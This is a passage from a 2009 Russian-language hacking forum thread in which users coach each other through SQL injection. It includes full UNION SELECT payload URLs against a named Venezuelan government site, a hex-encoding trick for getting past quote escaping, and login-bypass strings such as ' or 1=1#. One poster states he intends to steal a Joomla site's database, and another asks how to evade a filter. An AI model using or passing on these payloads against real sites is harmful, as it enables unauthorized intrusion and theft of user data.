27.09.2009, 19:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
Цитата:
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--
потому что надо имя таблицы брать в кавычки
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='PR OFILING'+limit+0,1--
но у тебя они слэшируются, значит переводи в hex
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x5 0524f46494c494e47--
|
|
|
27.09.2009, 19:50
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
как правильно использовать SQL Hex?
Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
Нужно ещё что-то перед хексом прописать?
|
|
|
|
27.09.2009, 20:01
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
С нами:
9963746
Репутация:
180
|
|
потому что надо имя таблицы брать в кавычки
но у тебя они слэшируются, значит переводи в hex
едрён батон, так вот почему у меня в старых записках в хексе было написано это  )) спс
|
|
|
|
27.09.2009, 20:20
|
|
Banned
Регистрация: 20.02.2008
Сообщений: 3
С нами:
9590541
Репутация:
0
|
|
Доброго времени суток.
имеется сайт на движке joomla (хз какая версия... - $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ (может кто подскажет что за версия))
путь к админке я нашёл, правда хз что с ней делать.
попробывал вот эту скуль index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql (любая цифра)] - на странице отобразилась шапка сайта и правая сторона, в середине всё пустое...(интересно что это даёт...).
затем нашёл путь _ http://sate.ru/plugins/content/highslide/ там рисунки.
в чём самый прикол то, что какие бы скуль инжект не забивал в строку вот таким способом - _ http://sate.ru/index.php..скульинжект то всё время показывает ошибку 404, а когда забиваю таким способом - _ http://sate/administrator/index.php..скульинжект то ни чего не выдаётся и не изменяется, просто как бы прогрузочка прошла и всё...а что изменилось или нет...хз....
так вот может кто подскажет что да как, может ссылочки какие даст кто, а то всё уже перечитал, хочу ещё чёнить почитать повтыкать, или совет какой попробывать....
А цель вообще всего этого, попробывать БД стянуть, не так давно на этом ресурсе 3 акка моих кто то спёр, вот хочу попробывать тоже...заодно разобраться во всём этом...)))
зы. знаю 100% что другте люди тырят от туда базу, это очевидно по тому что мои данные стырили....
зыы. попробывал методы которые описываются здесь реакции ноль... |
|
|
|
27.09.2009, 20:21
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
Работает или Microsoft-IIS/5.0 Htaccess?
надо сделать запрет на выполнение пхп
Код:
RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3
он его не воспринимает вообще,если оно так и должно быть то как найти вход?
Последний раз редактировалось Shadrin; 27.09.2009 в 20:23..
|
|
|
|
27.09.2009, 22:44
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Shadrin, .ht* только для apache!
Есть бажный сайт, при подставке кавычки в авторизацию пишет
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
select * from customers where customers_email_address='''
[TEP STOP]
Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже... |
|
|
|
27.09.2009, 22:51
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от mailbrush
Shadrin, .ht* только для apache!
Есть бажный сайт, при подставке кавычки в авторизацию пишет
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
select * from customers where customers_email_address='''
[TEP STOP]
Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже... пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.
|
|
|
|
27.09.2009, 22:57
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от L I G A
пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.
Запрос НЕ многострочный:
1. Запрос видно в ошибке.
2. Если бы я обрезал только одну строку комментарием #, то была бы ошибка.
3. Комментарий /* режет.
|
|
|
|
27.09.2009, 23:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
посмотри на запрос, у тебя он возвращает любой поле
авторизация (например) [данные-из-какой-то-колонки-customers]+pass
юзай вывод в ошибках
/add более подробно написано ниже)
Последний раз редактировалось l1ght; 27.09.2009 в 23:23..
|
|
|
|
08.10.2009, 23:31
|
|
Новичок
Регистрация: 08.10.2009
Сообщений: 1
С нами:
8732695
Репутация:
0
|
|
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Последний раз редактировалось smtgr; 08.10.2009 в 23:34..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
